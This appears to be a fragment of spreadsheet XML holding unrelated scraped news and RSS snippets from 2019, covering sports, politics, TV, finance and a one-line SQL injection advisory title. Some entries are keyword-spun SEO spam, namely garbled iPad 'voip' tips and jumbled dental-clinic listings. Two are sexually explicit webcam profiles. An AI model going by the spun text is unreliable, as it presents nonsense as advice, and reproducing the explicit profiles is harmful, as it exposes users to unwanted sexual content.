Steamgriddb website. INFO Buy now</t>
  </si>
  <si>
    <t>submitted by /u/simeonovvv [link] [comments] Interesting perspective on how the apple watch could help detect Mass Shootings</t>
  </si>
  <si>
    <t>Time, TV and streaming info for the La Liga match between Atlético Madrid and Real Madrid. Source: Sports Business News</t>
  </si>
  <si>
    <t>Source: http://feeds.maketecheasier.com/~r/MakeTechEasier/~3/_n6GmSUnuuQ/ Alternatives to Mint for Managing Your Money on Android If you’re interested in keeping track of your money but don’t feel like taking up accounting as a hobby, you might already be using Mint. It’s a lot better than going manual (it takes a special person to update their spreadsheet every day), but integration issues and a lack of investing tools are fairly common complaints, and some people just aren’t a fan of Intuit. Luckily, there’s a lot of competition out there now, and the category of “free apps that let you manage all your finances in one place” has grown significantly. That “free” qualification limits your options a bit, as a lot of… Read more Source: http://feeds.maketecheasier.com/~r/MakeTechEasier/~3/_n6GmSUnuuQ/ The post Alternatives to Mint for Managing Your Money on Android appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>Dr. Anthony</t>
  </si>
  <si>
    <t>Bayside Airdrie Dental &amp; Orthodontics serves patients in Airdrie Alberta and the surrounding areas. Book your visit! New patients are welcome. Bayside Airdrie Dental &amp; Orthodontics serves patients in Airdrie Alberta and the surrounding. Bayside Dental &amp; Orthodontics Offers Orthodontics Solutions in Airdrie – Airdrie, AB — (SBWIRE. a variety of dental solutions to its clients in the Airdrie area. Featuring a team of experienced. Airdrie Bayside Dental &amp; Orthodontics Provides General and Cosmetic Dentistry Services – Airdrie, AB. Dental &amp; Orthodontics offers comprehensive dentistry services and is always looking for the most suitable way to deliver long-lasting and natural-looking results. Speaking about why. Cosmetic Dental Clinic In Airdrie Vicki Vicki has been with Airdrie Springs Dental since September 2015. She provides services as a Registered Dental Hygienist.When not in the dental clinic, Vicki enjoys running, interval training, playing soccer, hanging with her family, Pediatric Dentistry, General Dentistry, Dentures, Dr. Jim Ellis DDS Dentist – Ogden Is The Cosmetic Dentistry In Ogden – Visiting the pediatric dentist in Ogden near. dental clinic in Abilene, UT, Dr. Jim Ellis DDS Dentist – Ogden is the. Disclaimer: Dr. Rahul Mathur is an Airdrie General Dentist. He is not a specialist in Cosmetic or Family Dentistry. Cosmetic Dentistry is not a specialty recognized by the Alberta Dental Association &amp; College (ADA&amp;C). Dr. Mathur provides. West Airdrie Dentist Alberta | Dr. Justin Navigation Home About Our Team Virtual Tour Services General Dentistry WHITENING Wisdom Teeth Emergency dentistry Specialty Services Dental Implants. Airdrie, Alberta T4B 3S6 Get Directions airdrie-dentist.com General Dentist · Cosmetic Dentist. Dentist &amp; Dental Office Bow River Concrete Solutions Local Service Dr. Murray Knebel General Dentist Relaxation Destination Massage Service. #1, 704 Main Street SE, Airdrie, Alberta View Practice Hours Facebook Instagram In-house Orthodontic Services Airdrie Dental Studio provides orthodontic services for our patients. Most Popular Dental Clinic In Airdrie Alberta Preferred Dentist In Airdrie Alberta Number 1 Dentist In Airdrie Alberta Cosmetic Dentist in Airdrie, Alberta 5 5 out of 5 stars. Closed Now Our Promise to You Our Mission Statement: To have a postive impact on the community of Highest Rated Dentist Near Airdrie Alberta Preferred Dentist In Airdrie Alberta Number 1 Dentist In Airdrie Alberta Cosmetic Dentist in Airdrie, Alberta 5 5 out of 5 stars. Closed Now Our Promise to You Our Mission Statement: To have a postive impact on the community of</t>
  </si>
  <si>
    <t>Your voip in uk is quite an amazing gadget, capable of many impressive feats. You may know some of what it does, but these tips will give you advanced tips. Your compare voip rates can become your one stop shop for paying the bills, checking your Facebook, playing games, and much more. Read on to educate yourself further. Don’t forget how many apps you are running at once. Many different iPad applications can continue processing information in the background and do not disturb the user. To see the things that your iPad is running, double click the Home button. The more you have running, the more battery you’ll use, so close those you don’t need. When you are finished looking at it, swipe down to close the bar. You can quickly get access to all the apps that are running on your betamax rates compare. Press the Home button twice and a bar with the running apps will appear. Tapping on an app in this bar will allow you to easily switch focus to that particular app. To take the bar away, just do a downward swipe on your screen. You don’t need to click the camera icon on your screen to view your photos. Just swipe your finger to the right to find the video or picture you just took. For earlier pictures, just swipe left instead. Monitor your voip rate comparison app spending. With all the exciting apps, and the easy way to buy them, it is easy to go overboard. So it is very important to keep track of what you spend. Open new webpages using a new tab to keep your current webpage open. Instead of tapping a link quickly, hold it until a menu appears. A pop-up menu will appear. One of the options allows you to launch a new tab with that link. Does it irritate you when you get an alert about your poivy rates detecting a wi-fi network? Just turn the notifications off! Go to the tab for Wi-Fi and turn off the last option if you wish to not have any more notifications. Screenshots are a great feature that the iPad offers. Just press the home and sleep buttons simultaneously. This will then take your screenshot, and it will save with your photos. You can change alert notifications that you get for Wi-Fi networks with ease. Go to Settings and opt for the Ask to Join Network option. Select that and you will no longer be bugged by all of the incoming invites. There is now an easy way to mute your iPad. There originally wasn’t a mute button on the first iPad. Once iOS 4.3 came out, there was an option added where your lock switch can mute the sound. Now, you can quickly mute your iPad by holding the “down” half of the volume button. Is the battery percentage annoying or distracting you? You can easily turn it off if you like. To start with, go to your Settings menu. Go to your General settings and locate Usage. Here, you can turn off the display for battery usage easily. If you have bought your child an iPad and are concerned that he or she may view mature content, simply block content of this sort by changing the settings. Go to settings and choose the setting that allows you to control mature content. You can block mature films and anything else that is labeled adult and/or has bad language. Get started with using your voip betamax, now that you understand it better. The more you learn, the more you will see how infinite the uses of betamax price comparison 2014 truly are. It is a great tool to have on hand, and you’ll be happy with your purchase. Do you want to get to your most popular apps as fast as possible? Double click the Home button, and they appear in an instant at the very bottom of whichever screen you are currently on. This single trick is a great way to save time as opposed to needing to scroll through every screen. Tons of people are always looking for more information about phone voip . With all that you’ve learned here on the subject, you’re ready to get out there with this knowledge. At first, you will realize this might be a foreign topic. That’s normal. Know that soon, though, you’ll shine through like the pro that you’ve become.</t>
  </si>
  <si>
    <t>ELITE season 2 came to an end in dramatic fashion on Netflix with episode 8, 0 Hours Missing. Here’s exactly what happened and the ending explained. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Admin</t>
  </si>
  <si>
    <t>Tea-break snack gets gourmet makeover for Christmas, with 1,500 flavour combinationsWe used to be content just nibbling milk chocolate off KitKat fingers, but soon Britons will be able to snack on a “luxury handcrafted” version – for up to £14 a bar – as the tea-break staple gets a gourmet makeover.Bespoke KitKats are expected to be one of this year’s must-have Christmas presents after its owner, the food giant Nestlé, revealed the upmarket KitKat Chocolatory range. Continue reading… Read More</t>
  </si>
  <si>
    <t>Sheanne Mulholland</t>
  </si>
  <si>
    <t>Young children’s imaginations have been running wild as they enjoy active play on a new wooden trim trail area at their school.</t>
  </si>
  <si>
    <t>Jenn Selby</t>
  </si>
  <si>
    <t>Channel 4 has released a special schedule of programmes for this year’s Stand Up To Cancer campaign. The aim of the annual event is to raise as much money as possible to fund life-saving research. Not only can viewers enjoy several celebrity-themed versions of their favourite C4 shows, but they can also get their hands on fundraising packs, take part in nationwide activities and donate to the cause as they watch by calling 0300 123 4444, or texting “Thirty”, “Twenty” or “Ten” to 70404. You can also donate online at channel4.com/su2c. The joint national campaign with Cancer Research UK and Channel 4 has raised more than £62m since it launched in 2012. This has funded no less than 52 clinical trials, and projects involving 11,000 cancer patients across the country. Here’s what you can expect to see on your TV screens this month as part of it. Celebrity Gogglebox Dani and Danny Dyer on Celebrity Googlebox 2018 A raft of new stars will be huddled around TV sets with some of the nation’s favourite reviewers for a sixth celebrity special. The full line-up of those taking part is yet to be revealed, but past celebrities have included Noel Gallagher, Naomi Campbell, Steve Coogan, One Direction, Danny and Dani Dyer and more. The first episode starts on Friday 13 September at 9pm. Celebrity Hunted The cast of Celebrity Hunted this season (Photo: C4/Press) Eight household names will attempt the impossible and try to get lost in the UK as part of the Celebrity Hunted team for Stand Up To Cancer. Father of the Prime Minister, Stanley Johnson, former Made In Chelsea star Georgia “Toff” Toffolo, Aldo Zilli, Jean-Christophe Novelli, Martin Offiah, Gavin Henson, and Towie stars Lucy Mecklenburgh and Lydia Bright will attempt to remain at large for two weeks while a team of professional investigators track them down. Celebrity Hunted will air this Autumn on Channel 4, though scheduling date is yet to be announced. Celebrity First Dates Hotel Fred Sirieix is back to matchmake a new gang of lovebirds on location in Italy (Photo: Channel 4) The First Dates hotel is ready to fling open its doors once more to four famous singletons to meet their potential love matches. Set in the Italian countryside, manager Fred Sirieix and his hotel team of matchmakers will host the venue’s first ever celebrity special to raise money for cancer research. Heading to the pool this year will be Blue singer Duncan James, who will make his first public appearance as a gay man. Former presenter Ulrika Jonsson will meet an unsuspecting member of the public, as will Towie star Pete Wicks and TV presenter AJ Odudu. Celebrity First Dates Hotel will air this Autumn on Channel 4, though scheduling date is yet to be announced. The Last Leg Left to right: Show co-hosts: Josh Widdicombe, Adam Hills and Alex Brooker (Photo: Open Mike Productions) Adam Hills, Alex Brooker and Josh Widdicombe are back for a brand new series of their award-winning topical show The Last Leg. They’ll be starting the season with a Stand Up To Cancer special, featuring a whole host of celebrity stars. The Last Leg will air this Autumn on Channel 4, though scheduling date is yet to be announced. More on TV Top Boy season 3: Netflix release date, cast, trailer and everything else about new series produced by Drake I cancelled my Netflix subscription. Will we cope without it? Tonight's TV: An intimate film charting a trans man's pregnancy Celebrity MasterChef: ★★★ the predictable format is still entertaining Supermarket Sweep revival: as chaotic and camp as ever ★★★ EastEnders reveals details of new character Leo King The post Stand Up To Cancer 2019 line-up: from Celebrity Hunted to Gogglebox, everything on Channel 4 for SU2C appeared first on inews.co.uk. The post Stand Up To Cancer 2019 line-up: from Celebrity Hunted to Gogglebox, everything on Channel 4 for SU2C appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>After his election in 2016, Mr. Trump took a tour of the White House and was reportedly “awed” at the size and scope of the issues that came to the president’s desk and the system that delivered them there. It is no surprise why: Mr. Trump had never served in the military or government of any kind. Managing it all got more daunting when his first national security adviser, Michael Flynn, resigned in disgrace, and the president did not get along with his eventual replacement, H.R. McMaster. Although denied high-level positions early in the Trump administration, Mr. Bolton, who replaced General McMaster in April 2018, could have been a good fit for the job under an inexperienced president. Compared with Mr. Flyyn and General McMaster, Mr. Bolton is a seasoned Washington player, one who considers himself a “good bureaucrat.” Even if he never shared all Mr. Trump’s policy preferences, Mr. Bolton was well positioned to work the levers of government for him. Instead, Mr. Bolton decided to break the interagency system that had served as the heart of American foreign policy for over seven decades. Driven by confidence in his own ideas about what government should do and how it should run, he had in mind something closer to Roosevelt’s juggling: The president in a room with the national security adviser and a few aides making decisions about most important issues in the world. To realize that plan, Mr. Bolton included fewer people in meetings, made council sessions far less regular, and raced to always be by Mr. Trump’s side. There was no longer a National Security Council, in effect, just a national security adviser. Mr. Bolton broke government and then it broke him. As the national security adviser, he pushed for a hard line on North Korea, Iran, Venezuela and Afghanistan. But without a structure behind him, Mr. Bolton was increasingly alone trying sell positions that were a hard sell to Mr. Trump, who is much less an ideologue and much harder to pin down. Eventually, Mr. Trump split with Mr. Bolton and began consulting with outsiders like the Fox News personality Tucker Carlson. When Mr. Bolton fell out with the president, the ad hoc system collapsed right along with him, as reports over the messy decision-making on the proposed Afghanistan peace deal and talks demonstrate. Mr. Bolton’s singular achievement was to dismantle a foreign-policymaking structure that had until then kept the president from running foreign policy by the seat of his pants. Mr. Bolton persuaded Mr. Trump he didn’t need the National Security Council to make decisions; it is no surprise that the president eventually felt confident deciding he did not need a national security adviser, either. Whether Mr. Trump names a replacement for Mr. Bolton does not matter: No one is going to convince the president he needs a system now, let alone the one that existed for 70 years. Source link</t>
  </si>
  <si>
    <t>Everything you need to know to find a winner at the Clarence River Jockey Club meeting.</t>
  </si>
  <si>
    <t>waine</t>
  </si>
  <si>
    <t>CBS Sports ranks the top prospects for the NBA Draft Original Source College basketball’s practices have started up, and while most fans will scour headlines to see how their players look for this season, NBA scouts will be fanning out to try and get a gauge on the top players for next June. Projecting the NBA Draft is a year-long exercise, and often even more than that, as scouts attempt to keep track of players for future drafts as well. And that’s what makes CBS Sports writer Kyle Boone’s rankings of the top prospects for 2020 so much fun to try and break down. This year’s draft won’t be without controversy, including two potential high-lottery picks logging time overseas (including LaMelo Ball), what looks like a strong international class and even some of the top prospects from 2019 on whom there are some seriously diverging opinions. “There is no consensus No. 1 player,” Boone wrote. “Even the top group of players can vary dependent upon preferences and projections. That’s why there’s intrigue, perhaps more so this year than in recent years, about how the upcoming season might shape next year’s draft. The talent being spread from Duke to Memphis to the NBL and to Tel Aviv only further muddies a draft class that at this stage appears to be quite difficult to forecast.” But just because it’s difficult doesn’t mean it’s not worth doing or talking about, and that’s certainly true of picking the players who, right now, look the most like first-round picks. function load_vendor_fbpixel() if(typeof fbq === ‘undefined’) !function(f,b,e,v,n,t,s)if(f.fbq)return;n=f.fbq=function()n.callMethod? n.callMethod.apply(n,arguments):n.queue.push(arguments);if(!f._fbq)f._fbq=n; n.push=n;n.loaded=!0;n.version=’2.0′;n.queue=[];t=b.createElement(e);t.defer=1; t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)(window, document,’script’,’https://connect.facebook.net/en_US/fbevents.js’); fbq(‘init’, ‘320233411816140’); fbq(‘init’, ‘1575186632756631’); fbq(‘track’, ‘PageView’);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CBS Sports ranks the top prospects for the NBA Draft appeared first on Sky-News. Source link</t>
  </si>
  <si>
    <t>My Kinks: Webcam profile: I love people who play with themselves. Forget the limits and enter my room Favourite sex position: What I do in my amateur show: What I don’t like: Gallery</t>
  </si>
  <si>
    <t>Charmaine Kane</t>
  </si>
  <si>
    <t>Two people are treated for hypothermia after being plucked from the hull of their overturned boat in waters off the Gold Coast overnight.</t>
  </si>
  <si>
    <t>Jules Knox</t>
  </si>
  <si>
    <t>After a horse trailer toppled over in a horrific collision in the Okanagan last Saturday, animal advocates are voicing concern that a horse was left in distress for too long.</t>
  </si>
  <si>
    <t>CGO</t>
  </si>
  <si>
    <t>He doesn’t know whether people will care about his film like they did Avengers: Endgame See full article at Independent.co.uk » The post Avatar 2 and 3: James Cameron isn’t sure whether the world wants his sequels appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>YOU THOUGHT PPI was all over. It is now! On 29 August the guillotine on PPI reclaiming fell – cutting off your ability to claim for mis-sold PPI. It’s likely in total over £40 billion will be paid out. Yet many people have wrongly had tax taken off their payouts, and can now claim it back. Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>Career</t>
  </si>
  <si>
    <t>Cleaning couples wanted for cleaning from 5 to 10 pm, Monday to Friday. Experience preferred, but wiling to train anyone with the right disposition to work. If you are interested please respond to this add by calling or messaging to (403) 891 9305. Pay depending on experience. You will need to provide a police .. Read more</t>
  </si>
  <si>
    <t>In the latest episode of “The Steelers Post-Game” show, we break down all the news you need to know surrounding the Black-and-Gold from the most recent contest. The Pittsburgh Steelers 2019 season is here, and it has gotten off to a disastrous 0-3 start. Take a look at the rundown for the latest episode of the BTSC podcast The Steelers Post-Game Show. On this show Jeff Hartman and co-host Lance Williams break down all things Steelers! Check out the rundown of the show: News and Notes Recap after the loss to the 49ers Winners and Losers Steelers Q&amp;A and MUCH MORE! Jeff Hartman, editor of BTSC, and Lance Williams walk you through everything you need to know regarding the Black-and-gold. If you haven’t heard, we have a YouTube channel, and the main reason for this is to increase the sound quality on our shows. But if you’re a visual learner you can watch the show below. Be sure to subscribe to our channel! If you missed the live show, be sure to check out all episodes on the following platforms: Apple Users: CLICK HERE Spotify: CLICK HERE Google Play: CLICK HERE If you’re old-school and just want the audio, you can listen to it in the player below.</t>
  </si>
  <si>
    <t>Lisa Visentin</t>
  </si>
  <si>
    <t>Mr Abbott and Nationals MP Barnaby Joyce joined thousands of protesters in Sydney’s Hyde Park on Sunday, as state MPs prepare to debate amendments this week.</t>
  </si>
  <si>
    <t>whaskell</t>
  </si>
  <si>
    <t>Everyone learns at a different pace, or so the variety of hours will change from person to person. In various ways philosophy is only a sort of meta, higher level consider the way science is finished. In that case, there’s nothing wrong with what you did in your very first section. Frequent complaints of the book concentrate on the absence of solutions to the exercises and the absence of depth in some https://grademiners.me specific chapters. A statement of purpose essay also has to be submitted. Keep in mind this is simply a sample. Despite the fact that the book is popular among undergrads, the reviews vary from awful to absolutely encouraged. That’s where philosophy steps in. It offers a number of analytic and numerical techniques for their solution. Their upcoming work includes redoing their study whilst taking into consideration small inhomogeneous and anisotropic perturbations, but they don’t expect little perturbations to significantly influence the results. The picture is an instance of an external USRoboticsModem. That amount of detail is beyond the reach of this piece, but this should give the foundations necessary for a lot of the vector manipulation that’s performed in the physics classroom. Applications now are also increasing in the area of riverine engineering. Definition slides introduce terms since they are wanted. You will gain from the flexibility and freedom to pick from a broad range of optional modules, permitting you to specialise if desired. The Benefits of Physics Mathematics However, without the basis of the core concepts, you cannot possibly aspire to use the info. We’re searching for a new Admin Assistant III. We should understand what you studied, where and when and you need to offer evidence of your preceding study. This research has resulted in a number of curricular instruments and techniques which may help instructors deliver more effective instruction (see reference 16). Teachers must be used in one of the regional authorities specified below. Your advisor will allow you to determine which courses you should finish. We are prepared to help you design a program that is appropriate for you. The sample curriculum is for a student who might want to get ready for actuarial sciences, and for that reason take the majority of the electives in Business and Economics. You have to be employed to teach mathematics or physics to be qualified for the payment. The main reason is that science is all about the concrete world but mathematics isn’t. The Department’s majors are accepted by the country’s best graduate schools. Please be aware that the curriculum of this program is now being reviewed as a member of a College-wide procedure to introduce a standardised modular structure. Understanding research usually means that should you experience an issue in the classroom (for instance, challenging behaviour or inclusion) you can explore research and utilize it to guide your teaching. A PE can oversee the job of different engineers, sign off on projects, and supply services straight to the general public. Aerospace engineers have to be in a position to translate a set of issues into requirements and to determine why a specific design doesn’t work.</t>
  </si>
  <si>
    <t>The launch of WoW Classic last month seemed to be well underway, players returning en masse to vanilla Azeroth (and causing at the same time connection queues thorny enough). According to Superdata, many who came back were out-of-date subscribers, which led to a sharp rise in subscription revenues as they returned to the game. The latest report from Superdata indicates that gaming subscription revenues have increased "by about 223% in August compared to July". That was enough for the game to fly high in the analyst's PC earnings chart, ranking third behind Dungeon Fighter Online and League. legends. World of Warcraft was the seventh most profitable game in July. Despite the success of WoW Classic, however, it did not exceed the historical records of World of Warcraft. According to Superdata, total revenue in August was still below that of Blizzard at the same time last year, with the release of the current Battle for Azeroth extension. Given the skepticism surrounding WoW Classic before its launch, I imagine that Blizzard is rather pleased with these results. The success of WoW Classic has of course been felt elsewhere. On the one hand, the Warcraft-related research on Pornhub tripled in the hours and days that followed the launch, while the players found themselves with a lot of time to lose while the queues got together. reduced. With the new WoW Classic community appearing to be staying here, it seems that some of the community's grievances about Battle for Azeroth have been forgotten. It remains to be seen if the next major expansion of the game will receive a warm welcome as possible. INFO Buy now</t>
  </si>
  <si>
    <t>The coroner is examining the death of a man after a six-hour siege at his ex-partner's house involving a full Tactical Response Group team and police negotiator.</t>
  </si>
  <si>
    <t>September 20, 2019. 2:35 ET In an exclusive interview with NPR, House Speaker Nancy Pelosi says she has not changed her mind on pursuing impeachment but is ready to change the law to restrain presidential power and make it clear that a sitting president can, in fact, be indicted. (NPR) I wonder what has Donald Trump done. A bad odor is coming from the White House. https://www.npr.org/2019/09/20/762594886/pelosi-says-congress-should-pass-new-laws-so-sitting-presidents-can-be-indicted</t>
  </si>
  <si>
    <t>Old songs are the best. [The YouTube] What’s been on your mind? Got something you’d like to share? A topic to discuss? It’s Tuesday Night Open Thread. Who wants to start?</t>
  </si>
  <si>
    <t>GrumpySecurityGuy</t>
  </si>
  <si>
    <t>Hospital-Management version 1.26 suffers from a remote SQL injection vulnerability. Published at: September 18, 2019 at 10:32PM View on Packet Storm The post Hospital-Management 1.26 SQL Injection appeared first on Secured Me.</t>
  </si>
  <si>
    <t>In recent days, I’ve taken to referring to Jerral Wayne Jones as “Santa Jerry” for the money the head Cowboy has doled out this year to the likes of DeMarcus Lawrence, Jaylon Smith, La’el Collins and Ezekiel Elliott. Source: Sports Business News</t>
  </si>
  <si>
    <t>The NRL may not complete its investigation into the Josh Hodgson HIA controversy until after Sunday’s grand final, concedes head of football Graham Annesley.</t>
  </si>
  <si>
    <t>Reuters: Business News</t>
  </si>
  <si>
    <t>Guggenheim Partners global chief investment officer Scott Minerd warned on Tuesday the firm's recession forecast model showed a 58% chance of the economy being in a recession by mid-2020, and a 77% chance of one beginning in the next 24 months.</t>
  </si>
  <si>
    <t>US President Donald Trump says his administration is imposing additional sanctions on Iran following last weekend’s attack on Saudi oil facilities, which the administration has blamed on the Islamic Republic.</t>
  </si>
  <si>
    <t>The latest five minute news bulletin from BBC World Service.</t>
  </si>
  <si>
    <t>Jake Niall</t>
  </si>
  <si>
    <t>For Tom Hawkins and the QC Geelong engages to put his case at the tribunal, there appears to be only one avenue for challenging the suspension.</t>
  </si>
  <si>
    <t>Nathanael Cooper</t>
  </si>
  <si>
    <t>It has been two decades since dance icon Kelley Abbey last performed in a musical, and the role couldn't be more suited to her.</t>
  </si>
  <si>
    <t>Kevin Nielsen</t>
  </si>
  <si>
    <t>More changes appear to be in the works for Grand River Transit.</t>
  </si>
  <si>
    <t>Fraser Crawford</t>
  </si>
  <si>
    <t>Chelsea take on Brighton &amp; Hove Albion at Stamford Bridge on Saturday afternoon. Here is the team we expect Frank Lampard to select for the game:</t>
  </si>
  <si>
    <t>David Knox</t>
  </si>
  <si>
    <t>New factual series The UnXplained with William Shatner begins on History next week. This premiered in the US in July. From the producers of Ancient Aliens and The Curse of Oak Island comes The UnXplained, a one-hour, non-fiction series that explores the world’s most fascinating, strange, and inexplicable mysteries. Hosted and executive produced by Golden Globe and Emmy Award-winning actor William Shatner (Star Trek, Boston Legal) each episode will feature compelling contributions from scientists, historians, witnesses, and experiencers – each seeking to shed light on how the seemingly impossible can happen. From mysterious structures (like Florida’s Coral Castle) and so-called “evil” places (like the cursed “White City” of Honduras) to strange creatures and bizarre rituals, The UnXplained will explore subjects that have mystified mankind for centuries. Wednesdays from October 2 at 9.30pm on History.</t>
  </si>
  <si>
    <t>Shoe Warehouse</t>
  </si>
  <si>
    <t>Every Shoe &amp; Boot $99 and under Sitewide (Online Only) Free Shipping on all orders of $99 and above. Afterpay available online. Brands such as Julius Marlow, Hush Puppies, Clarks and more. Example Mens Styles: Julius Marlow Lifted - RRP $189.95 | Now $99 inc. Free Shipping Hush Puppies Chelsea - RRP $159.95 | Now $99 inc Free Shipping Clarks Becken Cap - RRP $129.95 | Now $69 Shop all Men's styles here: Example Women's Styles: Rockport Trustride ProWalker - RRP $199.95 | Now $99 inc. Free Shipping Clarks Un Bali Way - RRP $159.95 | Now $99 inc. Free Shipping Hush Puppies Mimosa - RRP $149.95 | Now $99 inc. Free Shipping Shop all Womens Styles here:</t>
  </si>
  <si>
    <t>Margaret Fulton has been fondly remembered for her generosity, warmth, force of character and cheekiness in a state memorial service in Sydney.</t>
  </si>
  <si>
    <t>Indonesian investigators have found that design and oversight lapses played a key role in the October crash of Boeing Co's 737 MAX jet that killed all 189 aboard, the Wall Street Journal said on Sunday.</t>
  </si>
  <si>
    <t>My Kinks: Webcam profile: Hello Guys¡¡ I’m so happy to have you here. You know what I love the most? When you come to visit me and make me feel like a princess! I love to chat and get to know people arround the world. You can find me every day in the morning or afternoon so don’t forget that we have an appointment to enjoy and explode in pleasure together Favourite sex position: I like all positions What I do in my amateur show: I like to feel watched and wanted, to feel that someone watches me while masturbating What I don’t like: impolite people Gallery</t>
  </si>
  <si>
    <t>An emergency warning has been issued for a bushfire in Broome, Western Australia. The alert has been issued for people in the northern suburb of Bilingurr, and including areas north of Fairway Drive, east of Buckleys Road, and up to one kilometre north of Morrell Park Road. Emergency services say that there is a threat to lives and homes, and residents should evacuate immediately if safe to do so. For those not at home, it is too dangerous to return.</t>
  </si>
  <si>
    <t>Dr. Saad</t>
  </si>
  <si>
    <t>Along with its recommendations, the research initiative published an operational guideline on how health-care practitioners could set up clinics to provide the injectable therapy that is most. Back on the campaign trail and Meng Wanzhou’s case is back in court; In-The-News for Sept. 23 – and hydromorphone for patients who have not responded to the most effective oral treatments. The Crosstown Clinic in. Cosmetic Dental Clinic In Medicine Hat Alberta Medicine Hat, Alberta T1B 0M9 Services Offered Click on the subject you wish more information on, "Providing exceptional dental care to Medicine Hat and other communities in southern Alberta and Saskatchewan" TALK TO A DENTAL PROFE. Medicine Hat Dentists at Courtyard Dental Centre are dedicated to family dentistry such as Exams, Teeth Whitening, Veneers and Best Dentists in Medicine Hat, AB – Courtyard Dental Centre, Crestwood Dental Clinic, Southside Dental, Sun City Dental, Dr. Brenda Krasko Family Dental, River Dental, Grover Dental Centre, Schow Dental, Park Meadows Dental, Galvin Dental. Ascension Providence will hold a free health care clinic at the Waco Convention Center for. because of more complicated. Preferred Dental Clinic Near Medicine Hat Crestwood dentists in Medicine Hat provide a range of restorative and cosmetic dental services. We make the dental struggle disappear! Contact us today!. Crestwood Dental – Your Medicine Hat Dentists At Crestwood Dental Clinic, we understand. Cosmetic Dental Clinic In Medicine Hat Alberta Medicine Hat, Alberta T1B 0M9 Services Offered Click on the subject you Medicine Hat Dentist Dr. Nick Douvis was born in Medicine Hat and raised both in town and on an acreage just south of Dunmore. Since joining the clinic, Dr. Douvis and his team have committed themselves to upholding the quality of care that. This is one of the most popular Dental Clinic in the Parramatta. This is also one of the trusted dental clinics because people are now not afraid of visiting dentists of Parramatta Dental Clinic. As the technology has evolved, so does the.</t>
  </si>
  <si>
    <t>Jonco</t>
  </si>
  <si>
    <t>via</t>
  </si>
  <si>
    <t>Marvellous mid-century style proved a timeless choice for buyers as eight bidders battled for a landmark home in Eaglemont.</t>
  </si>
  <si>
    <t>CEP Administrator</t>
  </si>
  <si>
    <t>Pope Francis delivers a speech in Port Louis on 9 September 2019 during his visit to Mauritius Photo Credit: Vatican Media / Reuters [ACNS, by Rachel Farmer] The visit of Pope Francis to Mauritius on Monday brought fresh energy and confidence to Christians in the country, according to the Bishop of Mauritius, Ian Earnest, … Continue reading "Papal embrace for new director of the Anglican Centre in Rome during Mauritius visit" The post Papal embrace for new director of the Anglican Centre in Rome during Mauritius visit appeared first on Anglican Church of Canada - CEP online.</t>
  </si>
  <si>
    <t>Take a Trip with Tina – Your Trusted And Personal Travel Agent The post Take a Trip with Tina – Your Trusted And Personal Travel Agent appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Adam Sweeting</t>
  </si>
  <si>
    <t>Suicidal: In Our Own Words Channel 5, 9.15pm ★★★★ September 10 is World Suicide Prevention Day, and Channel 5 marked the occasion with this sobering documentary, Suicidal. Focusing on male suicide – incredibly, now the UK’s biggest killer of men under 45 – it studied six patients at the Riverside Mental Health Centre in Hillingdon, west London. The results were both harrowing and heartbreaking. Director Rachel Harvie stood back and let her interviewees tell their stories, which served as both therapy and confessional. Charlie, a sad, mild-mannered boy of 18 covered in self-inflicted scars, has been diagnosed with ADHD, depression, social anxiety and “emotional disregulation”. Cut through the fancy shrink-speak, though, and his problems stemmed from being brutally bullied in his earlier years. He’s been yearning for oblivion ever since – “that’s the appeal – just silence”, as he put it. Leo, reliant on a church support group in Acton for his survival, has tried to end his life in numerous ways. “Every day there’s no rest,” he reflected. “It’s like the devil wants me dead so bad.” Leo evidently suffers delusions, but other patients had rational explanations for wanting to end their lives. Ron (63) was terrified of the imminent death of his gravely ill partner, Jen. Charlie in Suicidal: In Our Own Words (Photo: Channel 5) “If she goes I go – she’s my life,” he sobbed. 19-year-old Jack has been left emotionally shattered by the deaths of his parents and grandfather. It made agonising viewing. Stewart Hampton, an Army lance-corporal, refused to feel sorry for himself, even after deliberately crashing his car into a motorway barrier. He’s been caught out by the so-called “crisis of masculinity”. He used to let off steam by getting drunk and looking for a fight, but even the military don’t condone this sort of behaviour nowadays. Read More: Suicide rates in the UK reach highest level in 16 years as campaigners demand ‘urgent action’ “Old-fashioned manly men are going out of fashion,” he reckoned. They should have got Stewart together with Charlie, who was asked what he thought “being a man feels like”. “Being able to cope with things,” he replied. Teaching their patients to cope is the objective at the Riverside Centre, but it’s a perpetual work in progress, with uncertain results. Doubtless they could use more funding and more staff. Better still would be a kinder, gentler world. THEARTSDESK.COM More TV Reviews The Troubles: A Secret History: chilling look at Irish conflict ★★★★★ Celebrity MasterChef: ★★★ the predictable format is still entertaining Supermarket Sweep revival: as chaotic and camp as ever ★★★ State of the Union: ★★★ A sharp portrait of a failing marriage Python at 50: Silly Talks And Holy Grails: ★★★★ a revealing look back The Loudest Voice: A well-made drama with a lack of direction ★★★ The post Suicidal: In Our Own Words, review: this harrowing documentary made agonizing viewing appeared first on inews.co.uk. The post Suicidal: In Our Own Words, review: this harrowing documentary made agonizing viewing appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>And overstating the underdog.</t>
  </si>
  <si>
    <t>Rob Harris</t>
  </si>
  <si>
    <t>Controversial plans to trial drug tests for those on Newstart and the Youth Allowance will be revived by the Morrison government when Parliament resumes.</t>
  </si>
  <si>
    <t>Marcus Treacher, a senior executive at blockchain cross-border remittance giant Ripple is seemingly kicking-off a modern “cola war” with their emerging rival Libra, Facebook’s controversial cryptocurrency. Treacher, the head of Ripple’s strategic accounts globally, criticized the so-called Facebook cryptocurrency for being “a walled garden.” The executive stressed that only a handful of big players, including Facebook, Visa, MasterCard, Uber, and PayPal, practice excessive control over Libra. That gives it a right to limit access to certain services or prohibit outside players from becoming a part of the Libra ecosystem. Ripple, on the other hand, is not a closed system, added Treacher, stating that the company has no parameters. He stated: “It connects with all of the players that want to use the technology.” The comments follow a brewing rivalry between Ripple and Facebook ever since the latter announced its plans to foray into the payment space via Libra. The blockchain-based stablecoin, as Facebook confirmed, would be pegged to a pool of global currencies, including the US dollar, Euro, and Yen. Ripple, on the other hand, is already offering a similar service via its cross-border cryptocurrency XRP. Libra against Threats Facebook’s Libra is ahead of Ripple in terms of business scaling. The cryptocurrency is looking to onboard 